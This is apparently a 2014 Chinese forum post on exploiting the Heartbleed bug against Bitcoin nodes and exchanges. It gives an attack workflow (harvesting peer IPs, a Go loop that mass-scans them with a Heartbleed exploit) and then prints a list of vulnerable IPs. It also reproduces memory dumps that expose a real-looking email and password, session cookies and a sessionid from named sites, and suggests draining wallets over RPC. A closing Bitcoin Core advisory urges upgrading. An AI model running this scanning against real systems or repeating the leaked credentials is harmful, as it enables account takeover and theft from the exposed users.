Heartbleed漏洞如何影响比特币...

背景资料
分类:极客论道
点击数:9878

参评】Heartbleed漏洞如何影响比特币... 

本帖最后由 btcrobot 于 2014-4-21 11:46 编辑

Heartbleed漏洞如何影响比特币...让哥亲身告诉你Heartbleed漏洞 有多危险


声明:由本文引起的后续风险,请自担法律责任。


作者:btcrobot
 
捐助BTC:1NDnnWCUu926z4wxA3sNBGYWNQD3mKyes8
本来想写篇侧链相关的文章,可是感觉深度不够,另外比特坊的一个MM好像写了,哥不喜欢再废话,今天直接上点安全相关的。。。。。
 

邪恶八进制的分割线。。。。。。。。。。。。


关于Heartbleed漏洞,作为比特人,必须敏感啊,哥第一时间就觉得漏洞无限,思路无限,玩法无限,至于干掉xxx,那需要火星人的胆量,哥还是比较保守的,但是用另一个方式绕道而行,本文只是让你体验下:


步骤如下:


1. 找到各种比特币、山寨币的客户端IP地址,找到特定端口,该端口开启SSL
 


获取安装有bitcoin客户端ip的两种方式:
 
1.  下载一个qt-bitcoin客户端,打开debug.logok收集里面的IP
 
2014-04-21 01:53:27 init message: 加载完成
2014-04-21 01:53:27 Initialization result: 1
2014-04-21 01:53:28 ERROR: GetMyExternalIP() : connection closed
2014-04-21 01:53:28 receive version message: /Satoshi:0.8.5/: version 70001, blocks=296904, us=219.147.23.114:1650, them=58.64.155.69:8333, peer=58.64.155.69:8333
2014-04-21 01:53:28 Added time data, samples 2, offset -6 (+0 minutes)
2014-04-21 01:53:33 ERROR: GetMyExternalIP() : connection to 74.208.43.192:80 failed
2014-04-21 01:53:35 receive version message: /Satoshi:0.8.2.2/: version 70001, blocks=296904, us=219.147.23.114:1657, them=192.155.81.62:8333, peer=192.155.81.62:8333
2014-04-21 01:53:35 Added time data, samples 3, offset -13 (+0 minutes)
2014-04-21 01:53:35 No valid UPnP IGDs found
2014-04-21 01:53:35 upnp thread exit
2014-04-21 01:53:36 receive version message: /Satoshi:0.8.5/: version 70001, blocks=296904, us=219.147.23.114:1659, them=194.71.109.94:8333, peer=194.71.109.94:8333
2014-04-21 01:53:36 Added time data, samples 4, offset +12 (+0 minutes)
2014-04-21 01:53:36 socket recv error 10054
2014-04-21 01:53:41 ERROR: GetMyExternalIP() : connection closed
2014-04-21 01:53:48 receive version message: /Satoshi:0.9.99/: version 70002, blocks=296904, us=219.147.23.114:1680, them=71.13.251.162:8333, peer=71.13.251.162:8333
2014-04-21 01:53:48 Added time data, samples 5, offset -12 (+0 minutes)
2014-04-21 01:53:48 nTimeOffset = -6  (+0 minutes)
2014-04-21 01:53:48 ERROR: GetMyExternalIP() : connection to 212.117.175.194:80 failed
2014-04-21 01:53:48 ext-ip thread exit
2014-04-21 01:53:49 receive version message: /Satoshi:0.9.1/: version 70002, blocks=296904, us=219.147.23.114:1681, them=68.151.120.205:8333, peer=68.151.120.205:8333
2014-04-21 01:53:49 Added time data, samples 6, offset -13 (+0 minutes)
2014-04-21 01:53:50 receive version message: /Satoshi:0.9.0/: version 70002, blocks=296904, us=219.147.23.114:1682, them=88.178.92.109:8333, peer=88.178.92.109:8333
2014-04-21 01:53:50 Added time data, samples 7, offset -12 (+0 minutes)
2014-04-21 01:53:50 nTimeOffset = -12  (+0 minutes)

看看上面这些IP吧,收集下:)
 

2. 利用blockchain,这种杀伤力大点,点开https://blockchain.info/zh-cn/connected-nodes

不但知道了IP,而且直观的知道了用到的客户端版本,对于那些存在漏洞的版本,无语了,呵呵。。

<ignore_js_op style="word-wrap: break-word;"> 
file:///C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ksohtml\wps_clip_image-28929.png


3. 写一个小爬虫程序,自动化不断的抓取这些IP,保存为一个N G文件,格式如下,不要问我要代码。。。自己玩去
193.109.68.62        
212.3.147.37        
Xxx
Yyy
。。。。
 
 


4. 改进bleed程序,遍历整个文件,好吧,来点代码


func readLines(path string) ([]string, error) {
        file, err := os.Open(path)
        if err != nil {
                return nil, err
        }
        defer file.Close()

        var lines []string
        scanner := bufio.NewScanner(file)
        for scanner.Scan() {
                lines = append(lines, scanner.Text())
        }
        return lines, scanner.Err()
}

// writes the lines to the given file.
func writeLines(lines []string, path string, skipline int) error {
        file, err := os.Create(path)
        if err != nil {
                return err
        }
        defer file.Close()

        w := bufio.NewWriter(file)
        for i, line := range lines {
                if i < skipline {
                        continue
                }

                fmt.Fprintln(w, line)
        }
        return w.Flush()
}

func main() {
        var tgt bleed.Target

        flag.StringVar(&tgt.StartTls, "starttls", "", "use STARTTLS")
        flag.Parse()

        if flag.NArg() < 1 {
                usage(os.Args[0])
        }

        readLines, _ := readLines("ip.txt")
        tgt.HostIp = flag.Arg(0)
        u, err := url.Parse(tgt.HostIp)
        if err == nil && u.Host != "" {
                tgt.HostIp = u.Host
        }
        var Lines []string
        out, err := bleed.Heartbleed(&tgt, []byte("xxx"))
        if err == bleed.Safe {
                //log.Printf("%v - SAFE", tgt.HostIp)
                //os.Exit(0)
        } else if err != nil {
                //log.Printf("%v - ERROR: %v", tgt.HostIp, err)
                //os.Exit(2)
        } else {
                log.Printf("%v\n", string(out))
                log.Printf("%v - VULNERABLE", tgt.HostIp)
                //os.Exit(1)
        }

        for _, v := range readLines {
                tgt.HostIp = v
                u, err := url.Parse(tgt.HostIp)
                if err == nil && u.Host != "" {
                        tgt.HostIp = u.Host
                }
                out, err := bleed.Heartbleed(&tgt, []byte("xxx"))
                if err == bleed.Safe {
                        //log.Printf("%v - SAFE", tgt.HostIp)
                        //os.Exit(0)
                } else if err != nil {
                        //log.Printf("%v - ERROR: %v", tgt.HostIp, err)
                        //os.Exit(2)
                } else {
                        log.Printf("%v\n", string(out))
                        log.Printf("%v - VULNERABLE", tgt.HostIp)
                        Lines = append(Lines, tgt.HostIp)
                        //os.Exit(1)
                }
        }

        writeLines(Lines, "vv.txt", 0)

}




vv.txt成果,这些IP443分分钟被爆,顺便发现一个山寨的交易所。
 
193.109.68.62        
212.3.147.37        
149.210.135.59        
68.12.220.61        
198.154.110.58        
5.9.121.236        
71.232.19.139        
77.37.140.232        
212.83.51.80        
76.27.96.38        
46.234.101.56        
46.4.106.47        
106.187.43.55        
98.247.44.48        
46.10.210.17        
108.181.196.19        
103.16.26.78        
…………



上面这些IP直接被爆。。
 
 

重点突破:


随便测试一个:

密码出来了。。。好危险。。。
.email=|
00000220  6b 79 6e 65 70 25 34 30  6d 61 69 6c 2e 72 75 26  |kynep%40mail.ru&|
00000230  70 61 73 73 3d 66 4f 36  33 59 6a 67 5a 73 53 26  |pass=fO63YjgZsS&|
 



Heartbleed.exe 106.187.43.55
2014/04/11 15:47:25 ([]uint8) {
00000000  02 08 1c 67 69 74 68 75  62 2e 63 6f 6d 2f 70 68  |...github.com/ph|
00000010  69 6c 73 6f 6e 67 2f 62  74 63 72 6f 62 6f 74 42  |ilsong/btcrobotB|
00000020  54 43 52 4f 42 4f 54 20  4c 54 43 44 4f 47 47 82  |TCROBOT LTCDOGG.|
00000030  24 25 e6 d1 1a 2e 50 68  30 9b 8d a9 25 72 ea 16  |$%....Ph0...%r..|
00000040  5e 0b 49 3d cc cb 29 a6  95 90 f6 61 57 b3 2f ec  |^.I=..)....aW./.|
00000050  64 83 d0 9d f4 90 a0 75  b0 f6 27 f0 00 22 45 fc  |d......u..'.."E.|
00000060  f7 9a 9c 67 58 af 66 51  9b f3 9b 82 01 06 cb 31  |...gX.fQ.......1|
00000070  21 c1 3c 77 a0 f7 16 f2  9f a6 41 3f 23 7c 35 4a  |!.<w......A?#|5J|
00000080  5a 87 29 b3 64 7d 97 19  07 5d 07 16 d5 4c 25 9b  |Z.).d}...]...L%.|
00000090  b7 d6 79 6b 54 c0 74 ef  14 de 78 db 15 5a 35 17  |..ykT.t...x..Z5.|
000000a0  1b ce 4e 05 b1 9f 56 e8  ca 04 27 44 dd e3 b6 33  |..N...V...'D...3|
000000b0  df 48 b3 4b f4 de 7c 46  5f a4 10 4f 2a 3a 90 f6  |.H.K..|F_..O*:..|
000000c0  96 78 14 56 ae 17 97 a0  78 54 70 08 d7 a9 2b ab  |.x.V....xTp...+.|
000000d0  8e 0f 9e 89 17 25 21 0e  07 ca 28 a7 8b c5 c6 df  |.....%!...(.....|
000000e0  3a 5b fa cd e7 55 be bd  65 61 a7 c9 6e 47 ac 0c  |:[...U..ea..nG..|
000000f0  c6 0a 7b 43 c4 8a c6 40  1e b7 d0 d9 69 67 ba 01  |..{该Email地址已收到反垃圾邮件插件保护。要显示它您需要在浏览器中启用JavaScript。..|
00000100  2a 30 ba 10 2c 6e 4f 8c  18 ab d0 13 37 f5 72 13  |*0..,nO.....7.r.|
00000110  da 14 e7 b6 44 43 01 94  ba 3b 2d 41 ab 97 55 9b  |....DC...;-A..U.|
00000120  3d 0c fb 6c 38 ca b9 61  93 99 1d 45 71 61 7d 5a  |=..l8..a...Eqa}Z|
00000130  be a8 76 dd ba e8 54 8f  1a 3d 0a 24 93 98 7b 67  |..v...T..=.$..{g|
00000140  c7 7b ce 37 62 87 e3 b0  4a b2 f3 f7 63 67 73 86  |.{.7b...J...cgs.|
00000150  88 8c 55 32 06 d0 b1 a1  0e 9f 9f 97 b4 e9 82 26  |..U2...........&|
00000160  b7 f8 65 36 2e dc 1c 76  6d 98 ee 2a 3d 0d 00 01  |..e6...vm..*=...|
00000170  10 b5 ed e0 bc 0b 46 43  5f f0 de f6 7c 4b 76 a2  |......FC_...|Kv.|
00000180  0d a4 73 a2 d5 39 1e 4f  66 51 b9 8f d4 d3 b0 c5  |..s..9.OfQ......|
00000190  c6 d2 cc 4d 8b cd 6f 96  c2 f3 87 ff 95 f7 95 8b  |...M..o.........|
000001a0  23 d4 05 1d 44 5d dc 89  e6 24 94 85 55 28 5b 5c  |#...D]...$..U([\|
000001b0  a2 14 2f b1 22 f5 b0 ca  ac ab 04 61 a4 58 f4 df  |../."......a.X..|
000001c0  8e 63 de 9c 31 7b df eb  85 ba c7 14 d9 3e 31 67  |.c..1{.......>1g|
000001d0  34 47 8a 77 2c d2 0e 90  7c e6 78 96 58 b9 2b 33  |4G.w,...|.x.X.+3|
000001e0  cc 4a 45 6d d5 07 9f ac  68 21 5f d8 c3 72 db a1  |.JEm....h!_..r..|
000001f0  2b be c2 38 39 39 88 4a  50 b4 56 5f d5 a8 ef 9d  |+..899.JP.V_....|
00000200  50 d3 ba 48 9a ac 6f 6e  74 72 6f 6c 3a 20 6e 6f  |P..H..ontrol: no|
00000210  2d 63 61 63 68 65 0d 0a  0d 0a 65 6d 61 69 6c 3d  |-cache....email=|
00000220  6b 79 6e 65 70 25 34 30  6d 61 69 6c 2e 72 75 26  |kynep%40mail.ru&|
00000230  70 61 73 73 3d 66 4f 36  33 59 6a 67 5a 73 53 26  |pass=fO63YjgZsS&|
00000240  72 65 6d 65 6d 62 65 72  2d 6d 65 3d 66 61 6c 73  |remember-me=fals|
00000250  65 7d eb 38 49 ab 9c 66  16 70 eb 9c a6 89 47 0a  |e}.8I..f.p....G.|
00000260  35 8c 22 67 8d 0a 0a 0a  0a 0a 0a 0a 0a 0a 0a 0a  |5."g............|
00000270  74 65 78 74 2f 63 73 73  2c 2a 2f 2a 3b 71 3d 30  |text/css,*/*;q=0|
00000280  2e 31 0d 0a 41 63 63 65  70 74 2d 4c 61 6e 67 75  |.1..Accept-Langu|
00000290  61 67 65 3a 20 65 6e 2d  75 73 2c 65 6e 3b 71 3d  |age: en-us,en;q=|
000002a0  30 2e 35 0d 0a 41 63 63  65 70 74 2d 45 6e 63 6f  |0.5..Accept-Enco|
000002b0  64 69 6e 67 3a 20 67 7a  69 70 2c 20 64 65 66 6c  |ding: gzip, defl|
000002c0  61 74 65 0d 0a 52 65 66  65 72 65 72 3a 20 68 74  |ate..Referer: ht|
000002d0  74 70 73 3a 2f 2f 62 74  63 64 65 61 6c 2e 69 6f  |tps://btcdeal.io|
000002e0  2f 69 6e 64 65 78 2e 68  74 6d 0d 0a 43 6f 6f 6b  |/index.htm..Cook|
000002f0  69 65 3a 20 63 6f 6e 6e  65 63 74 2e 73 69 64 3d  |ie: connect.sid=|
00000300  73 25 33 41 44 4e 30 5a  39 69 57 65 48 30 47 6c  |s%3ADN0Z9iWeH0Gl|
00000310  64 6c 35 67 73 39 44 5a  62 6b 6b 51 2e 4d 57 7a  |dl5gs9DZbkkQ.MWz|
00000320  57 68 6f 63 42 4c 37 4b  54 64 62 65 7a 6c 66 52  |WhocBL7KTdbezlfR|
00000330  72 47 31 53 75 31 52 58  39 63 53 44 74 73 6c 62  |rG1Su1RX9cSDtslb|
00000340  65 63 71 50 55 33 65 67  0d 0a 43 6f 6e 6e 65 63  |ecqPU3eg..Connec|
00000350  74 69 6f 6e 3a 20 6b 65  65 70 2d 61 6c 69 76 65  |tion: keep-alive|
00000360  0d 0a 49 66 2d 4d 6f 64  69 66 69 65 64 2d 53 69  |..If-Modified-Si|
00000370  6e 63 65 3a 20 4d 6f 6e  2c 20 31 37 20 46 65 62  |nce: Mon, 17 Feb|
00000380  20 32 30 31 34 20 31 35  3a 33 30 3a 31 38 20 47  | 2014 15:30:18 G|
00000390  4d 54 0d 0a 49 66 2d 4e  6f 6e 65 2d 4d 61 74 63  |MT..If-None-Matc|
000003a0  68 3a 20 22 31 34 31 31  2d 31 33 39 32 36 35 31  |h: "1411-1392651|
000003b0  30 31 38 30 30 30 22 0d  0a 0d 0a 47 45 54 20 2f  |018000"....GET /|
000003c0  63 73 73 2f 62 6f 6f 74  73 74 72 61 70 2e 6d 69  |css/bootstrap.mi|
000003d0  6e 2e 63 73 73 20 48 54  54 50 2f 31 2e 31 0d 0a  |n.css HTTP/1.1..|
000003e0  48 6f 73 74 3a 20 62 74  63 64 65 61 6c 2e 69 6f  |Host: btcdeal.io|
000003f0  0d 0a 55 73 65 72 2d 41  67 65 6e 74 3a 20 4d 6f  |..User-Agent: Mo|
00000400  7a 69 6c 6c 61 2f 35 2e  30 20 28 57 69 6e 64 6f  |zilla/5.0 (Windo|
00000410  77 73 20 4e 54 20 36 2e  31 3b 20 72 76 3a 32 34  |ws NT 6.1; rv:24|
00000420  2e 30 29 20 47 65 63 6b  6f 2f 32 30 31 30 30 31  |.0) Gecko/201001|
00000430  30 31 20 46 69 72 65 66  6f 78 2f 32 34 2e 30 0d  |01 Firefox/24.0.|
00000440  0a 41 63 63 65 70 74 3a  20 74 65 78 74 2f 63 73  |.Accept: text/cs|
00000450  73 2c 2a 2f 2a 3b 71 3d  30 2e 31 0d 0a 41 63 63  |s,*/*;q=0.1..Acc|
00000460  65 70 74 2d 4c 61 6e 67  75 61 67 65 3a 20 65 6e  |ept-Language: en|
00000470  2d 75 73 2c 65 6e 3b 71  3d 30 2e 35 0d 0a 41 63  |-us,en;q=0.5..Ac|
00000480  63 65 70 74 2d 45 6e 63  6f 64 69 6e 67 3a 20 67  |cept-Encoding: g|
00000490  7a 69 70 2c 20 64 65 66  6c 61 74 65 0d 0a 52 65  |zip, deflate..Re|
000004a0  66 65 72 65 72 3a 20 68  74 74 70 73 3a 2f 2f 62  |ferer: https://b|
000004b0  74 63 64 65 61 6c 2e 69  6f 2f 69 6e 64 65 78 2e  |tcdeal.io/index.|
000004c0  68 74 6d 0d 0a 43 6f 6f  6b 69 65 3a 20 63 6f 6e  |htm..Cookie: con|
000004d0  6e 65 63 74 2e 73 69 64  3d 73 25 33 41 44 4e 30  |nect.sid=s%3ADN0|
000004e0  5a 39 69 57 65 48 30 47  6c 64 6c 35 67 73 39 44  |Z9iWeH0Gldl5gs9D|
000004f0  5a 62 6b 6b 51 2e 4d 57  7a 57 68 6f 63 42 4c 37  |ZbkkQ.MWzWhocBL7|
00000500  4b 54 64 62 65 7a 6c 66  52 72 47 31 53 75 31 52  |KTdbezlfRrG1Su1R|
00000510  58 39 63 53 44 74 73 6c  62 65 63 71 50 55 33 65  |X9cSDtslbecqPU3e|
00000520  67 0d 0a 43 6f 6e 6e 65  63 74 69 6f 6e 3a 20 6b  |g..Connection: k|
00000530  65 65 70 2d 61 6c 69 76  65 0d 0a 49 66 2d 4d 6f  |eep-alive..If-Mo|
00000540  64 69 66 69 65 64 2d 53  69 6e 63 65 3a 20 54 68  |dified-Since: Th|
00000550  75 2c 20 32 30 20 46 65  62 20 32 30 31 34 20 31  |u, 20 Feb 2014 1|
00000560  31 3a 35 31 3a 35 31 20  47 4d 54 0d 0a 49 66 2d  |1:51:51 GMT..If-|
00000570  4e 6f 6e 65 2d 4d 61 74  63 68 3a 20 22 38 31 39  |None-Match: "819|
00000580  32 32 2d 31 33 39 32 38  39 37 31 31 31 30 30 30  |22-1392897111000|
00000590  22 0d 0a 0d 0a 54 22 69  47 b6 49 55 b9 4c d7 c3  |"....T"iG.IU.L..|
000005a0  22 ad 6f 17 cf 5a e3 c3  86 06 06 06 06 06 06 06  |".o..Z..........|
000005b0  20 22 31 34 31 31 2d 31  33 39 32 36 35 31 30 31  | "1411-139265101|
000005c0  38 30 30 30 22 0d 0a 43  61 63 68 65 2d 43 6f 6e  |8000"..Cache-Con|
000005d0  74 72 6f 6c 3a 20 6d 61  78 2d 61 67 65 3d 30 0d  |trol: max-age=0.|
000005e0  0a 0d 0a 2a 29 13 10 22  a6 ea b4 c2 f8 79 2a 58  |...*)..".....y*X|
000005f0  04 f9 79 64 28 95 e3 08  08 08 08 08 08 08 08 08  |..yd(...........|
00000600  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|




再来一个sessionid

|: XMLHttpRequest|
|..Referer: https|
|://5.9.121.236/l|
|ocalbitcoins/pro|
|d-cactus/..Cooki|
|e: csrftoken=hij|
|chiSccRjRQVOu6ki|
|mkPZFPp93IAiT; s|
|essionid=".eJxrY|
|KotZNSI4GJgYChJL|
|S5Jzs_PzkyNYANyy|
|_OLslNTQnnjE0tLM|
|uJLi1OL4jNTvJlDh|
|ZAEkhKTs1PzUkKVi|
|lPzSooq9UpLMnOK9|
|UDyeq65iZk5jkCWE|
|1QNV3FJUWpibnF-U|
|UkhUyhLSmJJaiFzq|
|R4A6bYsxw:1WW4vC|
|:YWAwBljNKntjyLf|
|qLXhVNBVrncE"..C|
|onnection: keep-|
|alive..If-Modifi|
|ed-Since: Fri, 1|
|1 Apr 2014 10:35|
|:05 GMT........;|
|`......~9D..X...|



若是443,如果是服务器,我靠,那你定时收集吧,模式匹配。。。。绕道到其他,web做跳板,之类的。。。
若是ssl+rpc,破了rpc,如果没设钱包密码,再发个指令转移比特币,oh, my god...

比特币都这样,山寨币就不用说了,如果有443漏洞,分分秒照样被搞。。。

heartbleed对比特币客户端的攻击是,在开启rpc协议的情况下,使用ssl认证,可以被攻击。这是绝大多数服务器程序才会开启的选项。个人用户不要恐慌。。。。


好了,不多说了,你们看着办吧,赶紧的升级吧,升了没坏处!!!!关键是网站用户,交易所,路由器端口映射也小心点。。

声明:纯技术探讨,其实我估计黑圈都知道。。。发出来冒着双向被骂的风险。。。你们感受下一下。。


OpenSSL Heartbleed vulnerability
11 April 2014What happened
The version of OpenSSL used by Bitcoin Core software version 0.9.0 and earlier contains a bug that can reveal memory to a remote attacker. See http://heartbleed.com/ for details.
What you should do
Immediately upgrade to Bitcoin Core version 0.9.1 which is linked against OpenSSL version 1.0.1g. If you use the official binaries, you can verify the version of OpenSSL being used from the Bitcoin Core GUI's Debug window (accessed from the Help menu). If you compiled Bitcoin Core yourself or use the Ubuntu PPA, update your system's OpenSSL. Linux users should also upgrade their system's version of OpenSSL.
Android
Android version 4.1.1 is vulnerable to Heartbleed. Try if you can upgrade to at least Android 4.1.2. If you are using Bitcoin Wallet on an Android phone, you should upgrade the app to at least version 3.45.
How serious is the risk
If you are using the Windows version of the Bitcoin Core GUI without a wallet passphrase, it is possible that your wallet could be compromised by clicking on a bitcoin: payment request link. If you are using bitcoind (on Linux, OSX, or Windows), have enabled the -rpcssl option, and allow RPC connections from the Internet, an attacker from a whitelisted (-allowip) IP address can very likely discover the rpcpassword and the last rpc request. It is possible (but unlikely) private keys could be sent to the attacker.
http://bbs.btcman.com/forum.php?mod=viewthread&tid=17782&extra=page=1